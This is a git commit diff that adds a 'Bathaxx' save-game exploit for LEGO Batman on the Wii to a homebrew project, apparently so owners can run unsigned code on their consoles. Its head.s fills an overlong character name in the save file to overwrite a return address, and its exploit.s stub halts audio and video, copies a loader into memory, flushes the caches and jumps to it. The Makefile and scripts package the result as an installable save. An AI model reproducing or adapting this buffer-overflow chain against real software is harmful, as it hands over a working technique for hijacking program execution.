From: Bernhard Urban Date: Sun, 2 Jan 2011 05:46:51 +0000 (+0100) Subject: LEGO Batman^H^H^Hhaxx X-Git-Url: http://wien.tomnetworks.com/gitweb/?p=savezelda.git;a=commitdiff_plain;h=da886e2a723e5990d209d8fc141dc9bab7bf0424;ds=sidebyside LEGO Batman^H^H^Hhaxx --- diff --git a/Makefile b/Makefile index a5a5120..d9920c0 100644 --- a/Makefile +++ b/Makefile @@ -52,6 +52,7 @@ all: FORCE .version $(Q)$(MAKE) -C loader $(Q)$(MAKE) -C twilight $(Q)$(MAKE) -C lego + $(Q)$(MAKE) -C batman FORCE: @@ -60,3 +61,4 @@ clean: $(MAKE) -C loader clean $(MAKE) -C twilight clean $(MAKE) -C lego clean + $(MAKE) -C batman clean diff --git a/batman/.gitignore b/batman/.gitignore new file mode 100644 index 0000000..bcb0659 --- /dev/null +++ b/batman/.gitignore @@ -0,0 +1 @@ +FILE_V28 diff --git a/batman/Makefile b/batman/Makefile new file mode 100644 index 0000000..af58778 --- /dev/null +++ b/batman/Makefile @@ -0,0 +1,116 @@ +# Copyright 2008-2009 Segher Boessenkool +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + +# Configuration: + +# What toolchain prefix should we use +CROSS ?= broadway- + +# Where are the tools (http://git.infradead.org/users/segher/wii.git) +TOOLS ?= $(HOME)/wii/segher + +# End of configuration. + + + +# Set CC, LD, OBJCOPY based on CROSS, unless they are set already + +ifeq ($(origin CC), default) + CC := $(CROSS)gcc -m32 +endif +ifeq ($(origin LD), default) + LD := $(CROSS)ld +endif +OBJCOPY ?= $(CROSS)objcopy + + +# The compiler flags we need. + +CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750 + + +# Build with "V=1" to see the commands executed; be quiet otherwise. + +ifeq ($(V),1) + Q := +else + Q := @ + MAKEFLAGS += --no-print-directory +endif + + +targets := rlbp.bin rlbj.bin rlbe.bin + +ppms := $(targets:%.bin=%-icon.ppm) rlb-banner.ppm +assets := title.bin $(ppms) + +loader := ../loader/loader.bin + + +titleid = $(shell perl titleid.pl $(1)) + + +define twintig + D=$(call titleid,$(1)); \ + $(TOOLS)/twintig $$D $@ toc-$1 +endef + + +all: $(targets) + +$(targets): %.bin: toc-% FILE_V28 $(assets) + @echo " TWINTIG $@" + $(Q)$(call twintig,$*) + +FILE_V28: head.bin exploit.bin $(loader) + @echo " LEGOSTACK $@" + $(Q)./pack.sh $@ $^ + $(Q)$(TOOLS)/lego-cksum $@ + +head.bin: head.elf + @echo " OBJCOPY $@" + $(Q)$(OBJCOPY) -Obinary $< $@ + +exploit.bin: exploit.elf + @echo " OBJCOPY $@" + $(Q)$(OBJCOPY) -Obinary $< $@ + +exploit.elf: lego.lds exploit.o + @echo " LINK $@" + $(Q)$(LD) -T $^ -o $@ + +head.elf: head.o + @echo " LINK $@" + $(Q)$(LD) -e 0 $< -o $@ + +exploit.o: exploit.s + @echo " ASSEMBLE $@" + $(Q)$(CC) $(CFLAGS) -c $< -o $@ + +head.o: head.s head.b + @echo " ASSEMBLE $@" + $(Q)$(CC) $(CFLAGS) -c $< -o $@ + +title.bin: ../.version + @echo " TITLEBIN $@" + $(Q)perl make-title-bin.pl > $@ + +../.version: FORCE + $(Q)$(MAKE) -C .. .version + +$(ppms): %.ppm: %.png + @echo " PPM $@" + $(Q)convert $< $@ + +$(loader): FORCE + $(Q)$(MAKE) -C ../loader + +FORCE: + +clean: + -rm -f $(targets) FILE_V28 + -rm -f exploit.bin exploit.elf exploit.o + -rm -f head.bin head.elf head.o + -rm -f title.bin diff --git a/batman/exploit.s b/batman/exploit.s new file mode 100644 index 0000000..ced2134 --- /dev/null +++ b/batman/exploit.s @@ -0,0 +1,45 @@ +# Copyright 2008-2009 Segher Boessenkool +# Copyright 2011 Bernhard Urban +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + .section .start,"ax" + retadr = 0x90394140 + + # The return addr for the nintendo loader is a bit different as for 3rd + # party loaders. In fact, it depends which value is set by the apploader at + # 0x8000002c: + # - 0x0: return address is 0x90394140 (some 3rd party loader, e.g. gecko os) + # - 0x23: return address is 0x90394000 (set by the sysmenu loader by nintendo) + # 0B ver: 0x90394100 + # to make both work, we insert some no op's here + .fill (0x140/0x4), 4, 0x60000000 + +start: + # Set up a stack frame. + lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1) + + # Stop audio and video. + lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl + lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl + + # Move code into place; a generous 32kB, starting at 64kB in + # the save file. + + lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4 + lis 4,(retadr-4)@h ; ori 4,4,(retadr-4)@l + # Calculate proper offset for the loader in memory +0: lbzu 0,4(4); cmpwi 0,0x60 ; beq 0b + addi 4,4,-4; addi 4,4,end-start + + li 0,0x2000 ; mtctr 0 +0: lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b + + # Sync caches on it. + li 0,0x0400 ; mtctr 0 ; mr 5,3 +0: dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b + sync ; isync + + # Go for it! + mtctr 3 ; bctr +end: diff --git a/batman/head.b b/batman/head.b new file mode 100644 index 0000000..7ed47c7 Binary files /dev/null and b/batman/head.b differ diff --git a/batman/head.s b/batman/head.s new file mode 100644 index 0000000..aa5081a --- /dev/null +++ b/batman/head.s @@ -0,0 +1,31 @@ +# Copyright 2011 Bernhard Urban +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + retadr = 0x90394140 +0: + # stolen from some savegame found in teh intertube + .incbin "head.b" + + # give the char a name + .ascii "you won't see this " # len = 0x14 + + # smash it \o/ 0x1f0+0x4 bytes all in all... + .fill (0xf4/4), 4, 0x11111111 + + # unlock the character (somewhere here actually...) + .fill (0x10/4), 4, 0x90c10104 + + # add more padding... + .fill (0xdc/4), 4, 0x11111111 + + # now we at the actual vuln return address + # just point to the loader of the loader (= content of exploit.s) + .long retadr + + # alternatively you can put the code here too and jump into the stack, + # however then you have to take care for nullbytes in the resulting + # bytecode, which is a way too tedious. so we just take the further slot for + # it :-) (LEGO devs are nice ppl, heh) + + .fill 0x10000 - (. - 0b) diff --git a/batman/lego.lds b/batman/lego.lds new file mode 100644 index 0000000..30d4a0a --- /dev/null +++ b/batman/lego.lds @@ -0,0 +1,22 @@ +/* Copyright 2008-2009 Segher Boessenkool + This code is licensed to you under the terms of the GNU GPL, version 2; + see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ + +OUTPUT_FORMAT("elf32-powerpc") +OUTPUT_ARCH(powerpc:common) + +SECTIONS { + audio_stop = 0x8009cfa0; + video_stop = 0x800ab190; + + main = 0x90000020; + + .twilight 0x90394000: + { + rlb*.o(.start) + *(.text) + *(.rodata .rodata.*) + *(.data) + *(.bss) + } +} diff --git a/batman/make-title-bin.pl b/batman/make-title-bin.pl new file mode 100755 index 0000000..639905d --- /dev/null +++ b/batman/make-title-bin.pl @@ -0,0 +1,16 @@ +#!/usr/bin/perl +sub printline { + my $x = shift; + chomp $x; + $x .= "\0" x 32; + $x = substr $x, 0, 32; + $x =~ s/(.)/\0$1/g; + + print $x; +} + +$name = '"Bathaxx" by lewurm'; +$version = `cat ../.version`; + +printline $name; +printline $version; diff --git a/batman/pack.sh b/batman/pack.sh new file mode 100755 index 0000000..57a388b --- /dev/null +++ b/batman/pack.sh @@ -0,0 +1,3 @@ +#!/bin/bash +TARGET=$1; shift +cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET diff --git a/batman/rlb-banner.png b/batman/rlb-banner.png new file mode 100644 index 0000000..ae1ed0c Binary files /dev/null and b/batman/rlb-banner.png differ diff --git a/batman/rlb-banner.ppm b/batman/rlb-banner.ppm new file mode 100644 index 0000000..deee310 Binary files /dev/null and b/batman/rlb-banner.ppm differ diff --git a/batman/rlbe-icon.png b/batman/rlbe-icon.png new file mode 100644 index 0000000..ea4caef Binary files /dev/null and b/batman/rlbe-icon.png differ diff --git a/batman/rlbe-icon.ppm b/batman/rlbe-icon.ppm new file mode 100644 index 0000000..77384ee Binary files /dev/null and b/batman/rlbe-icon.ppm differ diff --git a/batman/rlbj-icon.png b/batman/rlbj-icon.png new file mode 100644 index 0000000..360f78c Binary files /dev/null and b/batman/rlbj-icon.png differ diff --git a/batman/rlbj-icon.ppm b/batman/rlbj-icon.ppm new file mode 100644 index 0000000..8d01aa8 Binary files /dev/null and b/batman/rlbj-icon.ppm differ diff --git a/batman/rlbp-icon.png b/batman/rlbp-icon.png new file mode 100644 index 0000000..d63aa3d Binary files /dev/null and b/batman/rlbp-icon.png differ diff --git a/batman/rlbp-icon.ppm b/batman/rlbp-icon.ppm new file mode 100644 index 0000000..1cb01f8 Binary files /dev/null and b/batman/rlbp-icon.ppm differ diff --git a/batman/titleid.pl b/batman/titleid.pl new file mode 100755 index 0000000..f735f1d --- /dev/null +++ b/batman/titleid.pl @@ -0,0 +1,2 @@ +#!/usr/bin/perl +print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0]; diff --git a/batman/toc-rlbe b/batman/toc-rlbe new file mode 100644 index 0000000..5437490 --- /dev/null +++ b/batman/toc-rlbe @@ -0,0 +1,4 @@ +title.bin +rlb-banner.ppm +rlbe-icon.ppm +FILE_V28 FILE_V28 diff --git a/batman/toc-rlbj b/batman/toc-rlbj new file mode 100644 index 0000000..fbd0a8a --- /dev/null +++ b/batman/toc-rlbj @@ -0,0 +1,4 @@ +title.bin +rlb-banner.ppm +rlbj-icon.ppm +FILE_V28 FILE_V28 diff --git a/batman/toc-rlbp b/batman/toc-rlbp new file mode 100644 index 0000000..285e9ed --- /dev/null +++ b/batman/toc-rlbp @@ -0,0 +1,4 @@ +title.bin +rlb-banner.ppm +rlbp-icon.ppm +FILE_V28 FILE_V28